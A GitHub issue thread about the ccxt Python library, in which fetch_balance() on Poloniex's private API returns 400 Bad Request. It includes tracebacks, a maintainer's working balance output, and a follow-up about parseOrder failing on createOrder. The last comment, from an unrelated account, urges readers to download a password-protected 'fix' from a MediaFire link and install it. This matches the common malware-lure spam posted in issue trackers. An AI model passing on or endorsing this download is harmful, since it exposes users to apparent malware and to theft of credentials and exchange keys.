### ISSUE TITLE
request poloniex private api show 400 Bad Request

### ISSUE THREAD

**Issue by flowerDAI** [ccxt/ccxt#22636]
### Operating System

window

### Programming Languages

Python

### CCXT Version

4.3.27

### Description

use ccxt request fetch_balance() show 400 Bad Request,
public api is OK.

Error :
Traceback (most recent call last):
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\ccxt\base\exchange.py", line 645, in fetch
    response.raise_for_status()
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\requests\models.py", line 1021, in raise_for_status
    raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 400 Client Error: Bad Request for url: https://api.poloniex.com/accounts/balances?accountType=SPOT

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "d:\YH_Code\CCXT\PyDemo\testDemo\poloniex\poloniexBalance.py", line 13, in <module>
    balance = exchange.fetch_balance()
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\ccxt\poloniex.py", line 1555, in fetch_balance
    response = self.privateGetAccountsBalances(self.extend(request, params))
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\ccxt\base\types.py", line 35, in unbound_method
    return _self.request(self.path, self.api, self.method, params, config=self.config)
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\ccxt\base\exchange.py", line 3696, in request
    return self.fetch2(path, api, method, params, headers, body, config)
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\ccxt\base\exchange.py", line 3693, in fetch2
    return self.fetch(request['url'], request['method'], request['headers'], request['body'])
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\ccxt\base\exchange.py", line 663, in fetch
    self.handle_http_status_code(http_status_code, http_status_text, url, method, http_response)
  File "D:\ProgramFiles\Python\Python3102\lib\site-packages\ccxt\base\exchange.py", line 1712, in handle_http_status_code
    raise ErrorClass(self.id + ' ' + method + ' ' + url + ' ' + codeAsString + ' ' + reason + ' ' + body)
ccxt.base.errors.ExchangeNotAvailable: poloniex GET https://api.poloniex.com/accounts/balances?accountType=SPOT 400 Bad Request 

### Code

```
import ccxt
print('CCXT Version:', ccxt.__version__)
exchange_id = 'poloniex'  # change me
exchange = getattr(ccxt, exchange_id)({
    'apiKey': 'XXXXXX',
    'secret': 'XXXXXX',
})
print('---------------------------------------------------------------')
balance = exchange.fetch_balance()
```

**Comment by carlosmiei** [comment]
Hello @flowerDAI, can you please double-check your api-keys? I just tested and it worked

```

Python v3.12.3
CCXT v4.3.34
poloniex.fetchBalance()
{'ADA': {'free': 3.8084348, 'total': 3.8084348, 'used': 0.0},
 'BTTOLD': {'free': 0.001888, 'total': 0.001888, 'used': 0.0},
 'ETH': {'free': 0.00116007925, 'total': 0.00116007925, 'used': 0.0},
 'ETHF': {'free': 0.00116008, 'total': 0.00116008, 'used': 0.0},
 'ETHW': {'free': 0.00116008, 'total': 0.00116008, 'used': 0.0},
 'LTC': {'free': 0.003802634, 'total': 0.003802634, 'used': 0.0},
 'TRX': {'free': 0.0, 'total': 0.0, 'used': 0.0},
 'USDT': {'free': 19.5173790303925, 'total': 19.5173790303925, 'used': 0.0},
 'datetime': None,
 'free': {'ADA': 3.8084348,
          'BTTOLD': 0.001888,
          'ETH': 0.00116007925,
          'ETHF': 0.00116008,
          'ETHW': 0.00116008,
          'LTC': 0.003802634,
          'TRX': 0.0,
          'USDT': 19.5173790303925},
 'info': [{'accountId': '76118648825274368',
           'accountType': 'SPOT',
           'balances': [{'available': '0.003802634',
                         'currency': 'LTC',
                         'currencyId': '125',
                         'hold': '0.00'},
                        {'available': '19.5173790303925',
                         'currency': 'USDT',
                         'currencyId': '214',
                         'hold': '0.00'},
                        {'available': '0.00116007925',
                         'currency': 'ETH',
                         'currencyId': '267',
                         'hold': '0.00'},
                        {'available': '0.00',
                         'currency': 'TRX',
                         'currencyId': '315',
                         'hold': '0.00'},
                        {'available': '3.8084348',
                         'currency': 'ADA',
```

**Comment by carlosmiei** [comment]
@flowerDAI No problem, that happens 🙂 
IN that case I'm going to close the issue, let me know if anything!

**Comment by flowerDAI** [comment]
I use createOrder() ，this function  parseOrder()  error.

code：
object resultingTrades = this.safeValue(order, "resultingTrades");  //  this is null

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
